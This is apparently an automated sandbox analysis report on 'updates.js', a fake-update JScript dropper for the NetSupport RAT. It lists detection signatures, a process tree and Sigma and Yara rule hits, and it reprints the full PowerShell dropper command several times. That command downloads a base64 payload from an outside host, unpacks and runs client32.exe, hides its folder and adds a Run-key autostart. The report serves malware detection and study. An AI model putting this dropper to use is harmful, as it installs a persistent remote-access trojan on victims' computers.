Windows Analysis Report
updates.js

Overview

General Information

Sample name: updates.js
Analysis ID: 1474469
MD5: 2826502a26311bbe395d5ab565114330
SHA1: 1764ea00a1262c07b13d0c4b059e88e57650dfc4
SHA256: 65ab8ed555628693952b1fc385feca757b0a689981128d848f2c39a52e7da1e9
Tags: FAKEUPDATES, js, NetSupport

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Snort IDS alert for network traffic
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7336 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
updates.js | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

Source | Rule | Description | Author | Strings
00000007.00000002.1909048492.00000000111E2000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000008.00000000.1986528123.0000000000952000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

Source | Rule | Description | Author | Strings
8.2.client32.exe.73a90000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
7.2.client32.exe.73a90000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
7.0.client32.exe.950000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
3.2.client32.exe.6f290000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
1.2.powershell.exe.170baed8fc8.1.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

System Summary

                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 
'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 
'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ProcessId: 7336, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HQWQTO
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7424, TargetFilename: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; 
exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
                                Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 3a17fd44-b34d-41d8-a409-5a5030e19461 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; Engine Version = 5.1.19041.1682 Runspace ID = 3db943c9-3ccd-4813-a0d8-76fe9dd56238 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 3a17fd44-b34d-41d8-a409-5a5030e19461 Host Application = 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe'
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { 
Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
                                Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ProcessId: 7336, ProcessName: wscript.exe
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; 
